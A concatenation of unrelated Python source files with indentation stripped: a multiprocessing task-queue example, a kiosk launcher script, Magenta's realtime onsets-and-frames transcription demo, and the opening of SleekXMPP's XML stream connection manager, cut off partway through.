# Function run by worker processes
#
def worker(input, output):
for func, args in iter(input.get, 'STOP'):
result = calculate(func, args)
output.put(result)
#
# Function used to calculate result
#
def calculate(func, args):
result = func(*args)
return '%s says that %s%s = %s' % \
(current_process().name, func.__name__, args, result)
#
# Functions referenced by tasks
#
def mul(a, b):
time.sleep(0.5*random.random())
return a * b
def plus(a, b):
time.sleep(0.5*random.random())
return a + b
#
#
#
def test():
NUMBER_OF_PROCESSES = 4
TASKS1 = [(mul, (i, 7)) for i in range(20)]
TASKS2 = [(plus, (i, 8)) for i in range(10)]
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for task in TASKS1:
task_queue.put(task)
# Start worker processes
for i in range(NUMBER_OF_PROCESSES):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
print('Unordered results:')
for i in range(len(TASKS1)):
print('\t', done_queue.get())
time.sleep(5);
if task_queue.empty():
print("Task queue is empty");
# Add more tasks using `put()`
for task in TASKS2:
task_queue.put(task)
# Get and print some more results
for i in range(len(TASKS2)):
print('\t', done_queue.get())
# Tell child processes to stop
for i in range(NUMBER_OF_PROCESSES):
task_queue.put('STOP')
if __name__ == '__main__':
freeze_support()
test()
|
run.py
|
import threading
import subprocess
import os
def runTouch():
subprocess.call("python3 " + os.path.dirname(os.path.realpath(__file__)) + "/touch.py", shell=True)
def runPage():
subprocess.call("chromium-browser --allow-insecure-localhost --start-fullscreen \"" + os.path.dirname(os.path.realpath(__file__)) + "/index.html\"", shell=True)
touchThread = threading.Thread(target=runTouch)
touchThread.start()
pageThread = threading.Thread(target=runPage)
pageThread.start()
touchThread.join()
pageThread.join()
|
onsets_frames_transcription_realtime.py
|
# Copyright 2020 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Experimental realtime transcription demo."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import multiprocessing
import threading
from absl import app
from absl import flags
import attr
from colorama import Fore
from colorama import Style
from magenta.models.onsets_frames_transcription.realtime import audio_recorder
from magenta.models.onsets_frames_transcription.realtime import tflite_model
import numpy as np
flags.DEFINE_string('model_path', 'onsets_frames_wavinput.tflite',
'File path of TFlite model.')
flags.DEFINE_string('mic', None, 'Optional: Input source microphone ID.')
flags.DEFINE_float('mic_amplify', 30.0, 'Multiply raw audio mic input')
flags.DEFINE_string(
'wav_file', None,
'If specified, will decode the first 10 seconds of this wav file.')
flags.DEFINE_integer(
'sample_rate_hz', 16000,
'Sample Rate. The model expects 16000. However, some microphones do not '
'support sampling at this rate. In that case use --sample_rate_hz 48000 and'
'the code will automatically downsample to 16000')
FLAGS = flags.FLAGS
class TfLiteWorker(multiprocessing.Process):
"""Process for executing TFLite inference."""
def __init__(self, model_path, task_queue, result_queue):
multiprocessing.Process.__init__(self)
self._model_path = model_path
self._task_queue = task_queue
self._result_queue = result_queue
self._model = None
def setup(self):
if self._model is not None:
return
self._model = tflite_model.Model(model_path=self._model_path)
def run(self):
self.setup()
while True:
task = self._task_queue.get()
if task is None:
self._task_queue.task_done()
return
task(self._model)
self._task_queue.task_done()
self._result_queue.put(task)
@attr.s
class AudioChunk(object):
serial = attr.ib()
samples = attr.ib(repr=lambda w: '{} {}'.format(w.shape, w.dtype))
class AudioQueue(object):
"""Audio queue."""
def __init__(self, callback, audio_device_index, sample_rate_hz,
model_sample_rate, frame_length, overlap):
# Initialize recorder.
downsample_factor = sample_rate_hz / model_sample_rate
self._recorder = audio_recorder.AudioRecorder(
sample_rate_hz,
downsample_factor=downsample_factor,
device_index=audio_device_index)
self._frame_length = frame_length
self._overlap = overlap
self._audio_buffer = np.array([], dtype=np.int16).reshape(0, 1)
self._chunk_counter = 0
self._callback = callback
def start(self):
"""Start processing the queue."""
with self._recorder:
timed_out = False
while not timed_out:
assert self._recorder.is_active
new_audio = self._recorder.get_audio(self._frame_length -
len(self._audio_buffer))
audio_samples = np.concatenate(
(self._audio_buffer, new_audio[0] * FLAGS.mic_amplify))
# Extract overlapping
first_unused_byte = 0
for pos in range(0, audio_samples.shape[0] - self._frame_length,
self._frame_length - self._overlap):
self._callback(
AudioChunk(self._chunk_counter,
audio_samples[pos:pos + self._frame_length]))
self._chunk_counter += 1
first_unused_byte = pos + self._frame_length
# Keep the remaining bytes for next time
self._audio_buffer = audio_samples[first_unused_byte:]
# This actually executes in each worker thread!
class OnsetsTask(object):
"""Inference task."""
def __init__(self, audio_chunk: AudioChunk):
self.audio_chunk = audio_chunk
self.result = None
def __call__(self, model):
samples = self.audio_chunk.samples[:, 0]
self.result = model.infer(samples)
self.timestep = model.get_timestep()
def result_collector(result_queue):
"""Collect and display results."""
def notename(n, space):
if space:
return [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
' '][n % 12]
return [
Fore.BLUE + 'A' + Style.RESET_ALL,
Fore.LIGHTBLUE_EX + 'A#' + Style.RESET_ALL,
Fore.GREEN + 'B' + Style.RESET_ALL,
Fore.CYAN + 'C' + Style.RESET_ALL,
Fore.LIGHTCYAN_EX + 'C#' + Style.RESET_ALL,
Fore.RED + 'D' + Style.RESET_ALL,
Fore.LIGHTRED_EX + 'D#' + Style.RESET_ALL,
Fore.YELLOW + 'E' + Style.RESET_ALL,
Fore.WHITE + 'F' + Style.RESET_ALL,
Fore.LIGHTBLACK_EX + 'F#' + Style.RESET_ALL,
Fore.MAGENTA + 'G' + Style.RESET_ALL,
Fore.LIGHTMAGENTA_EX + 'G#' + Style.RESET_ALL,
][n % 12] # + str(n//12)
print('Listening to results..')
# TODO(mtyka) Ensure serial stitching of results (no guarantee that
# the blocks come in in order but they are all timestamped)
while True:
result = result_queue.get()
serial = result.audio_chunk.serial
result_roll = result.result
if serial > 0:
result_roll = result_roll[4:]
for notes in result_roll:
for i in range(6, len(notes) - 6):
note = notes[i]
is_frame = note[0] > 0.0
notestr = notename(i, not is_frame)
print(notestr, end='')
print('|')
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
results = multiprocessing.Queue()
results_thread = threading.Thread(target=result_collector, args=(results,))
results_thread.start()
model = tflite_model.Model(model_path=FLAGS.model_path)
overlap_timesteps = 4
overlap_wav = model.get_hop_size(
) * overlap_timesteps + model.get_window_length()
if FLAGS.wav_file:
wav_data = open(FLAGS.wav_file, 'rb').read()
samples = audio_recorder.wav_data_to_samples(wav_data,
model.get_sample_rate())
samples = samples[:model.get_sample_rate() *
10] # Only the first 10 seconds
samples = samples.reshape((-1, 1))
samples_length = samples.shape[0]
# Extend samples with zeros
samples = np.pad(
samples, (0, model.get_input_wav_length()), mode='constant')
for i, pos in enumerate(
range(0, samples_length - model.get_input_wav_length() + overlap_wav,
model.get_input_wav_length() - overlap_wav)):
chunk = samples[pos:pos + model.get_input_wav_length()]
task = OnsetsTask(AudioChunk(i, chunk))
task(model)
results.put(task)
else:
tasks = multiprocessing.JoinableQueue()
## Make and start the workers
num_workers = 4
workers = [
TfLiteWorker(FLAGS.model_path, tasks, results)
for i in range(num_workers)
]
for w in workers:
w.start()
audio_feeder = AudioQueue(
callback=lambda audio_chunk: tasks.put(OnsetsTask(audio_chunk)),
audio_device_index=FLAGS.mic if FLAGS.mic is None else int(FLAGS.mic),
sample_rate_hz=int(FLAGS.sample_rate_hz),
model_sample_rate=model.get_sample_rate(),
frame_length=model.get_input_wav_length(),
overlap=overlap_wav)
audio_feeder.start()
def console_entry_point():
app.run(main)
if __name__ == '__main__':
console_entry_point()
|
xmlstream.py
|
"""
sleekxmpp.xmlstream.xmlstream
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module provides the module for creating and
interacting with generic XML streams, along with
the necessary eventing infrastructure.
Part of SleekXMPP: The Sleek XMPP Library
:copyright: (c) 2011 Nathanael C. Fritz
:license: MIT, see LICENSE for more details
"""
from __future__ import with_statement, unicode_literals
import base64
import copy
import logging
import signal
import socket as Socket
import ssl
import sys
import threading
import time
import random
import weakref
import uuid
import errno
from xml.parsers.expat import ExpatError
import sleekxmpp
from sleekxmpp.util import Queue, QueueEmpty, safedict
from sleekxmpp.thirdparty.statemachine import StateMachine
from sleekxmpp.xmlstream import Scheduler, tostring, cert
from sleekxmpp.xmlstream.stanzabase import StanzaBase, ET, ElementBase
from sleekxmpp.xmlstream.handler import Waiter, XMLCallback
from sleekxmpp.xmlstream.matcher import MatchXMLMask
from sleekxmpp.xmlstream.resolver import resolve, default_resolver
# In Python 2.x, file socket objects are broken. A patched socket
# wrapper is provided for this case in filesocket.py.
if sys.version_info < (3, 0):
from sleekxmpp.xmlstream.filesocket import FileSocket, Socket26
#: The time in seconds to wait before timing out waiting for response stanzas.
RESPONSE_TIMEOUT = 30
#: The time in seconds to wait for events from the event queue, and also the
#: time between checks for the process stop signal.
WAIT_TIMEOUT = 1.0
#: The number of threads to use to handle XML stream events. This is not the
#: same as the number of custom event handling threads.
#: :data:`HANDLER_THREADS` must be at least 1. For Python implementations
#: with a GIL, this should be left at 1, but for implemetnations without
#: a GIL increasing this value can provide better performance.
HANDLER_THREADS = 1
#: The time in seconds to delay between attempts to resend data
#: after an SSL error.
SSL_RETRY_DELAY = 0.5
#: The maximum number of times to attempt resending data due to
#: an SSL error.
SSL_RETRY_MAX = 10
#: Maximum time to delay between connection attempts is one hour.
RECONNECT_MAX_DELAY = 600
#: Maximum number of attempts to connect to the server before quitting
#: and raising a 'connect_failed' event. Setting this to ``None`` will
#: allow infinite reconnection attempts, and using ``0`` will disable
#: reconnections. Defaults to ``None``.
RECONNECT_MAX_ATTEMPTS = None
log = logging.getLogger(__name__)
class RestartStream(Exception):
"""
Exception to restart stream processing, including
resending the stream header.
"""
class XMLStream(object):
"""
An XML stream connection manager and event dispatcher.
The XMLStream class abstracts away the issues of establishing a
connection with a server and sending and receiving XML "stanzas".
A stanza is a complete XML element that is a direct child of a root
document element. Two streams are used, one for each communication
direction, over the same socket. Once the connection is closed, both
streams should be complete and valid XML documents.
Three types of events are provided to manage the stream:
:Stream: Triggered based on received stanzas, similar in concept
to events in a SAX XML parser.
:Custom: Triggered manually.
:Scheduled: Triggered based on time delays.
Typically, stanzas are first processed by a stream event handler which
will then trigger custom events to continue further processing,
especially since custom event handlers may run in individual threads.
:param socket: Use an existing socket for the stream. Defaults to
``None`` to generate a new socket.
:param string host: The name of the target server.
:param int port: The port to use for the connection. Defaults to 0.
"""
def __init__(self, socket=None, host='', port=0, certfile=None,
keyfile=None, ca_certs=None, **kwargs):
#: Most XMPP servers support TLSv1, but OpenFire in particular
#: does not work well with it. For OpenFire, set
#: :attr:`ssl_version` to use ``SSLv23``::
#:
#: import ssl
#: xmpp.ssl_version = ssl.PROTOCOL_SSLv23
self.ssl_version = ssl.PROTOCOL_TLSv1
#: The list of accepted ciphers, in OpenSSL Format.
#: It might be useful to override it for improved security
#: over the python defaults.
self.ciphers = None
#: Path to a file containing certificates for verifying the
#: server SSL certificate. A non-``None`` value will trigger
#: certificate checking.
#:
#: .. note::
#:
#: On Mac OS X, certificates in the system keyring will
#: be consulted, even if they are not in the provided file.
self.ca_certs = ca_certs
#: Path to a file containing a client certificate to use for
#: authenticating via SASL EXTERNAL. If set, there must also
#: be a corresponding `:attr:keyfile` value.
self.certfile = certfile
#: Path to a file containing the private key for the selected
#: client certificate to use for authenticating via SASL EXTERNAL.
self.keyfile = keyfile
self._der_cert = None
#: The time in seconds to wait for events from the event queue,
#: and also the time between checks for the process stop signal.
self.wait_timeout = WAIT_TIMEOUT
#: The time in seconds to wait before timing out waiting
#: for response stanzas.
self.response_timeout = RESPONSE_TIMEOUT
#: The current amount to time to delay attempting to reconnect.
#: This value doubles (with some jitter) with each failed
#: connection attempt up to :attr:`reconnect_max_delay` seconds.
self.reconnect_delay = None
#: Maximum time to delay between connection attempts is one hour.
self.reconnect_max_delay = RECONNECT_MAX_DELAY
#: Maximum number of attempts to connect to the server before
#: quitting and raising a 'connect_failed' event. Setting to
#: ``None`` allows infinite reattempts, while setting it to ``0``
#: will disable reconnection attempts. Defaults to ``None``.
self.reconnect_max_attempts = RECONNECT_MAX_ATTEMPTS
#: The time in seconds to delay between attempts to resend data
#: after an SSL error.
self.ssl_retry_max = SSL_RETRY_MAX
#: The maximum number of times to attempt resending data due to
#: an SSL error.
self.ssl_retry_delay = SSL_RETRY_DELAY
#: The connection state machine tracks if the stream is
#: ``'connected'`` or ``'disconnected'``.
self.state = StateMachine(('disconnected', 'connected'))
self.state._set_state('disconnected')
#: The default port to return when querying DNS records.
self.default_port = int(port)
#: The domain to try when querying DNS records.
self.default_domain = ''
#: The expected name of the server, for validation.
self._expected_server_name = ''
self._service_name = ''
#: The desired, or actual, address of the connected server.
self.address = (host, int(port))
#: A file-like wrapper for the socket for use with the
#: :mod:`~xml.etree.ElementTree` module.
self.filesocket = None
self.set_socket(socket)
if sys.version_info < (3, 0):
self.socket_class = Socket26
else:
self.socket_class = Socket.socket
#: Enable connecting to the server directly over SSL, in
#: particular when the service provides two ports: one for
#: non-SSL traffic and another for SSL traffic.
self.use_ssl = False
#: Enable connecting to the service without using SSL
#: immediately, but allow upgrading the connection later
#: to use SSL.
self.use_tls = False
#: If set to ``True``, attempt to connect through an HTTP
#: proxy based on the settings in :attr:`proxy_config`.
self.use_proxy = False
#: If set to ``True``, attempt to use IPv6.
self.use_ipv6 = True
#: If set to ``True``, allow using the ``dnspython`` DNS library
#: if available. If set to ``False``, the builtin DNS resolver
#: will be used, even if ``dnspython`` is installed.
self.use_dnspython = True
#: Use CDATA for escaping instead of XML entities. Defaults
#: to ``False``.
self.use_cdata = False
#: An optional dictionary of proxy settings. It may provide:
#: :host: The host offering proxy services.
#: :port: The port for the proxy service.
#: :username: Optional username for accessing the proxy.
#: :password: Optional password for accessing the proxy.
self.proxy_config = {}
#: The default namespace of the stream content, not of the
#: stream wrapper itself.
self.default_ns = ''
self.default_lang = None
self.peer_default_lang = None
#: The namespace of the enveloping stream element.
self.stream_ns = ''
#: The default opening tag for the stream element.
self.stream_header = "<stream>"
#: The default closing tag for the stream element.
self.stream_footer = "</stream>"
#: If ``True``, periodically send a whitespace character over the
#: wire to keep the connection alive. Mainly useful for connections
#: traversing NAT.
self.whitespace_keepalive = True
#: The default interval between keepalive signals when
#: :attr:`whitespace_keepalive` is enabled.
self.whitespace_keepalive_interval = 300
#: An :class:`~threading.Event` to signal that the application
#: is stopping, and that all threads should shutdown.
self.stop = threading.Event()
#: An :class:`~threading.Event` to signal receiving a closing
#: stream tag from the server.
self.stream_end_event = threading.Event()
self.stream_end_event.set()
#: An :class:`~threading.Event` to signal the start of a stream
#: session. Until this event fires, the send queue is not used
#: and data is sent immediately over the wire.
self.session_started_event = threading.Event()
#: The default time in seconds to wait for a session to start
#: after connecting before reconnecting and trying again.
self.session_timeout = 45
#: Flag for controlling if the session can be considered ended
#: if the connection is terminated.
self.end_session_on_disconnect = True
#: A queue of stream, custom, and scheduled events to be processed.
self.event_queue = Queue()
#: A queue of string data to be sent over the stream.
self.send_queue = Queue(maxsize=256)
self.send_queue_lock = threading.Lock()
self.send_lock = threading.RLock()
#: A :class:`~sleekxmpp.xmlstream.scheduler.Scheduler` instance for
#: executing callbacks in the future based on time delays.
self.scheduler = Scheduler(self.stop)
self.__failed_send_stanza = None
#: A mapping of XML namespaces to well-known prefixes.
self.namespace_map = {StanzaBase.xml_ns: 'xml'}
self.__thread = {}
self.__root_stanza = []
self.__handlers = []
self.__event_handlers = {}
self.__event_handlers_lock = threading.Lock()
self.__filters = {'in': [], 'out': [], 'out_sync': []}
self.__thread_count = 0
self.__thread_cond = threading.Condition()
self.__active_threads = set()
self._use_daemons = False
self._disconnect_wait_for_threads = True
self._id = 0
self._id_lock = threading.Lock()
#: We use an ID prefix to ensure that all ID values are unique.
self._id_prefix = '%s-' % uuid.uuid4()
#: The :attr:`auto_reconnnect` setting controls whether or not
#: the stream will be restarted in the event of an error.
self.auto_reconnect = True
#: The :attr:`disconnect_wait` setting is the default value
#: for controlling if the system waits for the send queue to
#: empty before ending the stream. This may be overridden by
#: passing ``wait=True`` or ``wait=False`` to :meth:`disconnect`.
#: The default :attr:`disconnect_wait` value is ``False``.
self.disconnect_wait = False
#: A list of DNS results that have not yet been tried.
self.dns_answers = []
#: The service name to check with DNS SRV records. For
#: example, setting this to ``'xmpp-client'`` would query the
#: ``_xmpp-client._tcp`` service.
self.dns_service = None
self.add_event_handler('connected', self._session_timeout_check)
self.add_event_handler('disconnected', self._remove_schedules)
self.add_event_handler('session_start', self._start_keepalive)
self.add_event_handler('session_start', self._cert_expiration)
def use_signals(self, signals=None):
"""Register signal handlers for ``SIGHUP`` and ``SIGTERM``.
By using signals, a ``'killed'`` event will be raised when the
application is terminated.
If a signal handler already existed, it will be executed first,
before the ``'killed'`` event is raised.
:param list signals: A list of signal names to be monitored.
Defaults to ``['SIGHUP', 'SIGTERM']``.
"""
if signals is None:
signals = ['SIGHUP', 'SIGTERM']
existing_handlers = {}
for sig_name in signals:
if hasattr(signal, sig_name):
sig = getattr(signal, sig_name)
handler = signal.getsignal(sig)
if handler:
existing_handlers[sig] = handler
def handle_kill(signum, frame):
"""
Capture kill event and disconnect cleanly after first
spawning the ``'killed'`` event.
"""
if signum in existing_handlers and \
existing_handlers[signum] != handle_kill:
existing_handlers[signum](signum, frame)
self.event("killed", direct=True)
self.disconnect()
try:
for sig_name in signals:
if hasattr(signal, sig_name):
sig = getattr(signal, sig_name)
signal.signal(sig, handle_kill)
self.__signals_installed = True
except:
log.debug("Can not set interrupt signal handlers. " + \
"SleekXMPP is not running from a main thread.")
def new_id(self):
"""Generate and return a new stream ID in hexadecimal form.
Many stanzas, handlers, or matchers may require unique
ID values. Using this method ensures that all new ID values
are unique in this stream.
"""
with self._id_lock:
self._id += 1
return self.get_id()
def get_id(self):
"""Return the current unique stream ID in hexadecimal form."""
return "%s%X" % (self._id_prefix, self._id)
def connect(self, host='', port=0, use_ssl=False,
use_tls=True, reattempt=True):
"""Create a new socket and connect to the server.
Setting ``reattempt`` to ``True`` will cause connection
attempts to be made with an exponential backoff delay (max of
:attr:`reconnect_max_delay` which defaults to 10 minute) until a
successful connection is established.
:param host: The name of the desired server for the connection.
:param port: Port to connect to on the server.
:param use_ssl: Flag indicating if SSL should be used by connecting
directly to a port using SSL.
:param use_tls: Flag indicating if TLS should be used, allowing for
connecting to a port without using SSL immediately and
later upgrading the connection.
:param reattempt: Flag indicating if the socket should reconnect
after disconnections.
"""
self.stop.clear()
if host and port:
self.address = (host, int(port))
try:
Socket.inet_aton(self.address[0])
except (Socket.error, ssl.SSLError):
self.default_domain = self.address[0]
# Respect previous SSL and TLS usage directives.
if use_ssl is not None:
self.use_ssl = use_ssl
if use_tls is not None:
self.use_tls = use_tls
# Repeatedly attempt to connect until a successful connection
# is established.
attempts = self.reconnect_max_attempts
connected = self.state.transition('disconnected', 'connected',
func=self._connect,
args=(reattempt,))
while reattempt and not connected and not self.stop.is_set():
connected = self.state.transition('disconnected', 'connected',
func=self._connect)
if not connected:
if attempts is not None:
attempts -= 1
if attempts <= 0:
self.event('connection_failed', direct=True)
return False
return connected
def _connect(self, reattempt=True):
self.scheduler.remove('Session timeout check')
if self.reconnect_delay is None:
delay = 1.0
self.reconnect_delay = delay
if reattempt:
delay = min(self.reconnect_delay * 2, self.reconnect_max_delay)
delay = random.normalvariate(delay, delay * 0.1)
log.debug('Waiting %s seconds before connecting.', delay)
elapsed = 0
try:
while elapsed < delay and not self.stop.is_set():
time.sleep(0.1)
elapsed += 0.1
except KeyboardInterrupt:
self.set_stop()
return False
except SystemExit:
self.set_stop()
return False
if self.default_domain:
try:
host, address, port = self.pick_dns_answer(self.default_domain,
self.address[1])
self.address = (address, port)
self._service_name = host
except StopIteration:
log.debug("No remaining DNS records to try.")
self.dns_answers = None
if reattempt:
self.reconnect_delay = delay
return False
af = Socket.AF_INET
proto = 'IPv4'
if ':' in self.address[0]:
af = Socket.AF_INET6
proto = 'IPv6'
try:
self.socket = self.socket_class(af, Socket.SOCK_STREAM)
except Socket.error:
log.debug("Could not connect using %s", proto)
return False
self.configure_socket()
if self.use_proxy:
connected = self._connect_proxy()
if not connected:
if reattempt:
self.reconnect_delay = delay
return False
if self.use_ssl:
log.debug("Socket Wrapped for SSL")
if self.ca_certs is None:
cert_policy = ssl.CERT_NONE
else:
cert_policy = ssl.CERT_REQUIRED
ssl_args = safedict({
'certfile': self.certfile,
'keyfile': self.keyfile,
'ca_certs': self.ca_certs,
'cert_reqs': cert_policy,
'do_handshake_on_connect': False,
"ssl_version": self.ssl_version
})
if sys.version_info >= (2, 7):
ssl_args['ciphers'] = self.ciphers
ssl_socket = ssl.wrap_socket(self.socket, **ssl_args)
if hasattr(self.socket, 'socket'):
# We are using a testing socket, so preserve the top
# layer of wrapping.
self.socket.socket = ssl_socket
else:
self.socket = ssl_socket
try:
if not self.use_proxy:
domain = self.address[0]
if ':' in domain:
domain = '[%s]' % domain
log.debug("Connecting to %s:%s", domain, self.address[1])
self.socket.connect(self.address)
if self.use_ssl:
try:
self.socket.do_handshake()
except (Socket.error, ssl.SSLError):
log.error('CERT: Invalid certificate trust chain.')
if not self.event_handled('ssl_invalid_chain'):
self.disconnect(self.auto_reconnect,
send_close=False)
else:
self.event('ssl_invalid_chain', direct=True)
return False
self._der_cert = self.socket.getpeercert(binary_form=True)
pem_cert = ssl.DER_cert_to_PEM_cert(self._der_cert)
log.debug('CERT: %s', pem_cert)
self.event('ssl_cert', pem_cert, direct=True)
try:
cert.verify(self._expected_server_name, self._der_cert)
except cert.CertificateError as err:
if not self.event_handled('ssl_invalid_cert'):
log.error(err)
self.disconnect(send_close=False)
else:
self.event('ssl_invalid_cert',
pem_cert,
direct=True)
self.set_socket(self.socket, ignore=True)
#this event is where you should set your application state
self.event('connected', direct=True)
return True
except (Socket.error, ssl.SSLError) as serr:
error_msg = "Could not connect to %s:%s. Socket Error #%s: %s"
self.event('socket_error', serr, direct=True)
domain = self.address[0]
if ':' in domain:
domain = '[%s]' % domain
log.error(error_msg, domain, self.address[1],
serr.errno, serr.strerror)
return False
def _connect_proxy(self):
"""Attempt to connect using an HTTP Proxy."""
# Extract the proxy address, and optional credentials
address = (self.proxy_config['host'], int(self.proxy_config['port']))
cred = None
if self.proxy_config['username']:
username = self.proxy_config['username']
password = self.proxy_config['password']
cred = '%s:%s' % (username, password)
if sys.version_info < (3, 0):
cred = bytes(cred)
else:
cred = bytes(cred, 'utf-8')
cred = base64.b64encode(cred).decode('utf-8')
# Build the HTTP headers for connecting to the XMPP server
headers = ['CONNECT %s:%s HTTP/1.0' % self.address,
'Host: %s:%s' % self.address,
'Proxy-Connection: Keep-Alive',
'Pragma: no-cache',
'User-Agent: SleekXMPP/%s' % sleekxmpp.__version__]
if cred:
headers.append('Proxy-Authorization: Basic %s' % cred)
headers = '\r\n'.join(headers) + '\r\n\r\n'
try:
log.debug("Connecting to proxy: %s:%s", *address)
self.socket.connect(address)
self.send_raw(headers, now=True)
resp = ''
while '\r\n\r\n' not in resp and not self.stop.is_set():
resp += self.socket.recv(1024).decode('utf-8')
log.debug('RECV: %s', resp)
lines = resp.split('\r\n')
if '200' not in lines[0]:
self.event('proxy_error', resp)
self.event('connection_failed', direct=True)
log.error('Proxy Error: %s', lines[0])
return False
# Proxy connection established, continue connecting
# with the XMPP server.
return True
except (Socket.error, ssl.SSLError) as serr:
error_msg = "Could not connect to %s:%s. Socket Error #%s: %s"
self.event('socket_error', serr, direct=True)
log.error(error_msg, self.address[0], self.address[1],
serr.errno, serr.strerror)
return False
def _session_timeout_check(self, event=None):
"""
Add check to ensure that a session is established within
a reasonable amount of time.
"""
def _handle_session_timeout():
if not self.session_started_event.is_set():
log.debug("Session start has taken more " + \
"than %d seconds", self.session_timeout)
self.disconnect(reconnect=self.auto_reconnect)
self.schedule("Session timeout check",
self.session_timeout,
_handle_session_timeout)
def disconnect(self, reconnect=False, wait=None, send_close=True):
"""Terminate processing and close the XML streams.
Optionally, the connection may be reconnected and
resume processing afterwards.
If the disconnect should take place after all items
in the send queue have been sent, use ``wait=True``.
.. warning::
If you are constantly adding items to the queue
such that it is never empty, then the disconnect will
not occur and the call will continue to block.
:param reconnect: Flag indicating if the connection
and processing should be restarted.
Defaults to ``False``.
:param wait: Flag indicating if the send queue should
be emptied before disconnecting, overriding
:attr:`disconnect_wait`.
:param send_close: Flag indicating if the stream footer
should be sent before terminating the
connection. Setting this to ``False``
prevents error loops when trying to
disconnect after a socket error.
"""
self.state.transition('connected', 'disconnected',
wait=2.0,
func=self._disconnect,
args=(reconnect, wait, send_close))
def _disconnect(self, reconnect=False, wait=None, send_close=True):
if not reconnect:
self.auto_reconnect = False
if self.end_session_on_disconnect or send_close:
self.event('session_end', direct=True)
# Wait for the send queue to empty.
if wait is not None:
if wait:
self.send_queue.join()
elif self.disconnect_wait:
self.send_queue.join()
# Clearing this event will pause the send loop.
self.session_started_event.clear()
self.__failed_send_stanza = None
# Send the end of stream marker.
if send_close:
self.send_raw(self.stream_footer, now=True)
# Wait for confirmation that the stream was
# closed in the other direction. If we didn't
# send a stream footer we don't need to wait
# since the server won't know to respond.
if send_close:
log.info('Waiting for %s from server', self.stream_footer)
self.stream_end_event.wait(4)
else:
self.stream_end_event.set()
if not self.auto_reconnect:
self.set_stop()
if self._disconnect_wait_for_threads:
self._wait_for_threads()
try:
self.socket.shutdown(Socket.SHUT_RDWR)
self.socket.close()
self.filesocket.close()
except (Socket.error, ssl.SSLError) as serr:
self.event('socket_error', serr, direct=True)
finally:
#clear your application state
self.event('disconnected', direct=True)
return True
def abort(self):
self.session_started_event.clear()
self.set_stop()
if self._disconnect_wait_for_threads:
self._wait_for_threads()
try:
self.socket.shutdown(Socket.SHUT_RDWR)
self.socket.close()
self.filesocket.close()
except Socket.error:
pass
self.state.transition_any(['connected', 'disconnected'], 'disconnected', func=lambda: True)
self.event("killed", direct=True)
def reconnect(self, reattempt=True, wait=False, send_close=True):
"""Reset the stream's state and reconnect to the server."""
log.debug("reconnecting...")
if self.state.ensure('connected'):
self.state.transition('connected', 'disconnected',
wait=2.0,
func=self._disconnect,
args=(True, wait, send_close))
attempts = self.reconnect_max_attempts
log.debug("connecting...")
connected = self.state.transition('disconnected', 'connected',
wait=2.0,
func=self._connect,
args=(reattempt,))
while reattempt and not connected and not self.stop.is_set():
connected = self.state.transition('disconnected', 'connected',
wait=2.0, func=self._connect)
connected = connected or self.state.ensure('connected')
if not connected:
if attempts is not None:
attempts -= 1
if attempts <= 0:
self.event('connection_failed', direct=True)
return False
return connected
def set_socket(self, socket, ignore=False):
"""Set the socket to use for the stream.
The filesocket will be recreated as well.
:param socket: The new socket object to use.
:param bool ignore: If ``True``, don't set the connection
state to ``'connected'``.
"""
self.socket = socket
if socket is not None:
# ElementTree.iterparse requires a file.
# 0 buffer files have to be binary.
# Use the correct fileobject type based on the Python
# version to work around a broken implementation in
# Python 2.x.
if sys.version_info < (3, 0):
self.filesocket = FileSocket(self.socket)
else:
self.filesocket = self.socket.makefile('rb', 0)
if not ignore:
self.state._set_state('connected')
def configure_socket(self):
"""Set timeout and other options for self.socket.
Meant to be overridden.
"""
self.socket.settimeout(None)
def configure_dns(self, resolver, domain=None, port=None):
"""
Configure and set options for a :class:`~dns.resolver.Resolver`
instance, and other DNS related tasks. For example, you
can also check :meth:`~socket.socket.getaddrinfo` to see
if you need to call out to ``libresolv.so.2`` to
run ``res_init()``.
Meant to be overridden.
:param resolver: A :class:`~dns.resolver.Resolver` instance
or ``None`` if ``dnspython`` is not installed.
:param domain: The initial domain under consideration.
:param port: The initial port under consideration.
"""
pass
def start_tls(self):
"""Perform handshakes for TLS.
If the handshake is successful, the XML stream will need
to be restarted.
"""
log.info("Negotiating TLS")
ssl_versions = {3: 'TLS 1.0', 1: 'SSL 3', 2: 'SSL 2/3'}
log.info("Using SSL version: %s", ssl_versions[self.ssl_version])
if self.ca_certs is None:
cert_policy = ssl.CERT_NONE
else:
cert_policy = ssl.CERT_REQUIRED
ssl_args = safedict({
'certfile': self.certfile,
'keyfile': self.keyfile,
'ca_certs': self.ca_certs,
'cert_reqs': cert_policy,
'do_handshake_on_connect': False,
"ssl_version": self.ssl_version
})
if sys.version_info >= (2, 7):
ssl_args['ciphers'] = self.ciphers
ssl_socket = ssl.wrap_socket(self.socket, **ssl_args)
if hasattr(self.socket, 'socket'):
# We are using a testing socket, so preserve the top
# layer of wrapping.
self.socket.socket = ssl_socket
else:
self.socket = ssl_socket
try:
self.socket.do_handshake()
except (Socket.error, ssl.SSLError):
log.error('CERT: Invalid certificate trust chain.')
if not self.event_handled('ssl_invalid_chain'):
self.disconnect(self.auto_reconnect, send_close=False)
else:
self._der_cert = self.socket.getpeercert(binary_form=True)
self.event('ssl_invalid_chain', direct=True)
return False
self._der_cert = self.socket.getpeercert(binary_form=True)
pem_cert = ssl.DER_cert_to_PEM_cert(self._der_cert)
log.debug('CERT: %s', pem_cert)
self.event('ssl_cert', pem_cert, direct=True)
try:
cert.verify(self._expected_server_name, self._der_cert)
except cert.CertificateError as err:
if not self.event_handled('ssl_invalid_cert'):
log.error(err)
self.disconnect(self.auto_reconnect, send_close=False)
else:
self.event('ssl_invalid_cert', pem_cert, direct=True)
self.set_socket(self.socket)
return True
def _cert_expiration(self, event):
"""Schedule an event for when the TLS certificate expires."""
if not self.use_tls and not self.use_ssl:
return
if not self._der_cert:
